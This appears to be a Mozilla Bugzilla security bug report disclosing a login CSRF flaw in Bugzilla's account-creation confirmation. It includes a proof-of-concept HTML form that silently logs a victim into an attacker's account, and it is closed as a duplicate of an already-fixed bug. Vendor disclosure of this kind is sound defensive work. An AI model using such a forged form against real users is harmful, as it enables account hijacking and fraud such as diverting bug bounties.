Closed Bug 994297 Opened 11 years ago Closed 11 years ago

Switching a user to another account via lack of CSRF token in confirming account creation

Categories

(Bugzilla :: User Accounts, defect)

Product:
Bugzilla
Component:
User Accounts
Platform:
x86_64
Windows 8
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 713926

People

(Reporter: dawid, Unassigned)

Details

(Keywords: reporter-external)

Steps to reproduce: User logs in to his account and then the following actions are performed: 1. Enter https://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user. 2. Then log in the user to another account (attacker's account) via lack of CSRF token in confirming account creation. POC (for demonstration purposes with Submit button; normally sent automatically): <html> <body> <form action="https://bugzilla.mozilla.org/token.cgi" method="POST"> <input type="hidden" name="t" value="TOKEN_FOR_CONFIRMING_ACCOUNT_OF_ATTACKER" /> <input type="hidden" name="a" value="confirm&#95;new&#95;account" /> <input type="hidden" name="realname" value="" /> <input type="hidden" name="passwd1" value="PASSWORD_ATTACKER" /> <input type="hidden" name="passwd2" value="PASSWORD_ATTACKER" /> <input type="submit" value="Submit request" /> </form> </body> </html> Please notice, that there in no CSRF token in this request - attacker's knows TOKEN_FOR_CONFIRMING_ACCOUNT_OF_ATTACKER for his account, because he has received an URL with this token to his mail (this URL has a form: https://bugzilla.mozilla.org/token.cgi?t=TOKEN_FOR_CONFIRMING_ACCOUNT_OF_ATTACKER&a=request_new_account). That's why the attacker's knows all data needed to prepare the aforementioned POC. There might be different reasons for the attacker to launch this attack. An exemplary and interesting one is getting a bounty for a bug submitted by another user (The attacker switches the user into his account. The user thinks, that he uses his own account and submits a bug. The action is done from the attacker's account and the bounty goes to the attacker).
This is already fixed by bug 713926.
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Resolution: --- → DUPLICATE
Please notice that this report a different than https://bugzilla.mozilla.org/show_bug.cgi?id=713926. I am not talking here about CSRF in login. I report CSRF in confirming account creation. Yes - they both allow to do the same things, but they are two separate vulnerabilities.
(In reply to Dawid Czagan from comment #2) > they both allow to do the same things, but they are two separate vulnerabilities. They have the same root cause, which is already fixed in the other bug.
Group: bugzilla-security
You need to log in before you can comment on or make changes to this bug.